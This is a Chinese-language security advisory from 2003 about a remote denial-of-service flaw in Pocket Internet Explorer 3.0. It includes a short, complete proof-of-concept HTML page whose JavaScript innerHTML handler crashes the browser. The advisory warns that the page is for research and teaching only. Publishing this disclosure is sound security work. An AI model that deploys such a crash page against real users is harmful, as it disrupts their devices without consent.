Microsoft Pocket Internet Explorer远程拒绝服务攻击漏洞
发布日期:2003-01-03
更新日期:2003-01-08
受影响系统:Microsoft Pocket Internet Explorer 3.0
描述:
BUGTRAQ ID:
6507
Pocket Internet Explorer是一款用于Pocket PC上的WEB浏览器。
Pocket IE不正确处理部分Javascript代码,远程攻击者可以利用这个漏洞构建恶意WEB页,诱使用户访问,导致Pocket IE崩溃。
攻击者建立一个调用某一页面中JavaScript的object.innerHTML函数写入到页面本身的WEB页,可导致Pocket Internet Explorer浏览器访问此页面时崩溃。
<*来源:Christopher Sogge R?tnes (
crotnes@student.sv.uio.no)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=104160783907769&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Christopher Sogge R?tnes (
crotnes@student.sv.uio.no)提供了如下测试方法:
构建如下WEB页面,诱使Pocket PC用户访问:
<html>
<head>
<title>Crash PIE</title>
<script language="Javascript">
function displayPage(page){
if(page=="onload"){
main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">Crash
me</a>";
}
if(page=="crash"){
main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">You are
going down!</a>";
}
}
</script>
</head>
<body onLoad="displayPage('onload');">
<hr>
<span id="main"></span>
</body></html>
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/浏览次数:3048
严重程度:0(网友投票)
